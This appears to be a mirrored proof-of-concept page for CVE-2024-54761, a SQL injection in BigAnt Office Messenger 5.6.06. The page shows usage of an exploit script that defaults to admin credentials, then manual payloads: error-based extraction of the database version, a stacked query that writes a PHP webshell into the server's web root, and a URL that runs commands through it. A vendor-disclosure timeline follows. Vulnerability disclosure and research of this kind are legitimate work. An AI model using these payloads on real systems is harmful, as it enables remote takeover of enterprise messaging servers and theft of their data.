CVE-2024-54761 PoC — BigAntSoft BigAnt office messenger 安全漏洞

Source

https://github.com/nscan9/CVE-2024-54761

Associated Vulnerability

Title:BigAntSoft BigAnt office messenger 安全漏洞 (CVE-2024-54761)
Description:BigAntSoft BigAnt office messenger是澳大利亚BigAntSoft公司的一个针对企业环境的服务器/客户端即时消息程序。 BigAntSoft BigAnt office messenger 5.6.06版本存在安全漏洞。攻击者利用该漏洞可以通过“dev_code”参数进行 SQL 注入攻击。

Description

CVE-2024-54761 PoC

Readme

# BigAnt Office Messenger 5.6.06 RCE via SQL Injection
SQL injection vulnerability in BigAnt Messenger causes RCE vulnerability. Follow the steps to exploit.


Usage:
```
CVE-2024-54761.py [-h] -r RHOST [-p RPORT] [-u USERNAME] [-P PASSWORD]
options:
  -h, --help            show this help message and exit
  -r, --rhost RHOST     Target IP address
  -p, --rport RPORT     Target port (default 8000)
  -u, --username USERNAME
                        Login username (default admin)
  -P, --password PASSWORD
                        Login password in plain text
```
Run exploit for default credentials.
```
python CVE-2024-54761.py -r 127.0.0.1
```
<img width="643" height="241" alt="exploit" src="https://github.com/user-attachments/assets/7219f1bc-415c-4f7f-be8e-bd4bf690e0e6" />







# Manual exploit
Extract the database version used with the `dev_code` parameter that is exposed to SQLi.   
```python
# Payload
?dev_code=AND EXTARCTVALUE(rand(),concat(CHAR(126),version(),CHAR(126)))--
```
![SQLI version](https://github.com/user-attachments/assets/109a800c-af76-4a0b-9b42-0f03d0a9acbe)
Upload php webshell on target using SQL stack queries.
```python
# Payload
?dev_code=;SELECT "<?php system($GET['cmd']); ?>" INTO OUTFILE 'C:/Program Files (x86)/BigAntSoft/IM Console/im_webserver/htdocs/shell.php'-- -
```
 
![crate webshell 1](https://github.com/user-attachments/assets/258f0ae0-8c8e-4b09-b454-fcd4339d877c)
Proof of command execution: 
```python
/shell.php?cmd=whoami
```

![whoami](https://github.com/user-attachments/assets/94c2bf8e-6ba3-4329-aeaa-44215f88fed0)
![command dir](https://github.com/user-attachments/assets/07320b55-01c7-4e34-8d26-4b3a0d62d817)
# Timeline
31-10-2024: Submitted vulnerabilities to vendor via email

31-10-2024: Emailed vendor, no response

15-11-2024: Emailed vendor, no response

15-11-2024: Requested CVEs
# Reference
https://gist.github.com/nscan9/a31982c90ab40a8e00373bf15efbf52a   
https://www.bigantsoft.com

File Snapshot


 [4.0K]  /data/pocs/0eda5a43b50960070676c1fd731e5e72864dad56
├── [5.6K]  CVE-2024-54761.py
└── [1.9K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!